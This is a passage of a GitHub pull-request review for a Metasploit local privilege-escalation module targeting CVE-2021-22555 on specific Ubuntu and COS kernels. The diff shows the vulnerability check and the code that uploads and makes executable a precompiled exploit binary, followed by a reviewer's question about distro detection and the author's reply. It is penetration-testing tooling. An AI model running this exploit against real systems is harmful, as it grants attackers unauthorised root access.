modules/exploits/linux/local/netfilter_xtables_heap_oob_write_priv_esc.rb

```diff
@@ -0,0 +1,169 @@
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22555'],
+          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22555'],
+          ['URL', 'https://ubuntu.com/security/CVE-2021-22555']
+        ]
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('WritableDir', [true, 'Directory to write persistent payload file.', '/var/tmp']),
+        OptInt.new('CmdTimeout', [true, 'Maximum number of seconds to wait for the exploit to complete', 10])
+      ]
+    )
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def cmd_timeout
+    datastore['CmdTimeout'].to_i
+  end
+
+  def supported_kernels
+    ubuntu_kernels + cos_kernels
+  end
+
+  def ubuntu_kernels
+    [
+      '5.8.0-23-generic', '5.8.0-25-generic', '5.8.0-28-generic', '5.8.0-29-generic',
+      '5.8.0-33-generic', '5.8.0-34-generic', '5.8.0-36-generic', '5.8.0-38-generic',
+      '5.8.0-40-generic', '5.8.0-41-generic', '5.8.0-43-generic', '5.8.0-44-generic',
+      '5.8.0-45-generic', '5.8.0-48-generic', '5.8.0-49-generic', '5.8.0-50-generic',
+      '5.8.0-53-generic', '5.8.0-53-lowlatency'
+    ]
+  end
+
+  def cos_kernels
+    [ '5.4.89-1.el8.x86_64' ]
+  end
+
+  def kernel_supported?(kernel)
+    supported_kernels.include? kernel
+  end
+
+  def check
+    unless kernel_modules.include? 'ip_tables'
+      vprint_warning('The ip_tables module is not loaded.')
+      return CheckCode::Safe('The ip_tables module is not loaded.')
+    end
+
+    CheckCode::Safe('LKRG is installed') if lkrg_installed?
+    CheckCode::Safe('grsecurity is in use') if grsec_installed?
+
+    msgmni_path = '/proc/sys/kernel/msgmni'
+    CheckCode::Safe("#{msgmni_path} is not readable.") if !readable?(msgmni_path)
+    msgmni = cmd_exec('cat', msgmni_path, cmd_timeout).to_i
+    release = kernel_release
+    if kernel_supported? release
+      # Setting the MSGMNI to a lower value is an easy remedy for this exploit on vulnerable kernels.
+      # The exploit uses #define NUM_MSQIDS 4096, which is the minimum allowed message queue length.
+      if msgmni >= 4096
+        CheckCode::Vulnerable("Target is running kernel release #{release}.")
+      else
+        CheckCode::Safe("The kernel's MSGMNI queue size of #{msgmni} is too small for the exploit to execute successfully.")
+      end
+    else
+      CheckCode::Safe("The kernel release #{release} is not currently supported.")
+    end
+  end
+
+  def upload_exploit_binary
+    release = kernel_release
+    executable_name = rand_text_alphanumeric(5..10)
+    @executable_path = "#{base_dir}/#{executable_name}"
+
+    if (ubuntu_kernels.include? release)
+      upload_and_chmodx(@executable_path, exploit_data('CVE-2021-22555', 'ubuntu.elf'))
+    elsif (cos_kernels.include? release)
+      upload_and_chmodx(@executable_path, exploit_data('CVE-2021-22555', 'cos.elf'))
+    else
+      fail_with(Failure::NoTarget, 'The target OS cannot be targeted by this exploit.')
+    end
```

Comment:
If the module is stated to only support `Ubuntu` & `CentOS`, I believe the target needs to be further inspected for `distro` specific values.

The concerns I have with any `elf` selection is that you have fully evaluated the target details required.  Kernel version string is not a unique value as more than one `distro` could have the same kernel version.

It is mentioned [here](https://github.com/rapid7/metasploit-framework/pull/15698#discussion_r715486941) that you may be switching to a single binary.  The question that brings to mind is will this module still be `distro` restricted or is the revised `C` code valid for any distro on a compatible kernel version?

Reply:
`It is mentioned here that you may be switching to a single binary.` Apologies for the confusion. I meant that the Ubuntu binary would auto-target one of the vulnerable kernels and decide on the correct offsets to use when being executed. The COS and Ubuntu binaries are still different.

As for the fact that multiple distros can use the same kernel, I will give that a try on my end. I'll set up another linux environment and install one of the vulnerable kernels, and see if the exploit completes and I will get back to you 👍  Then we can see where to take it from there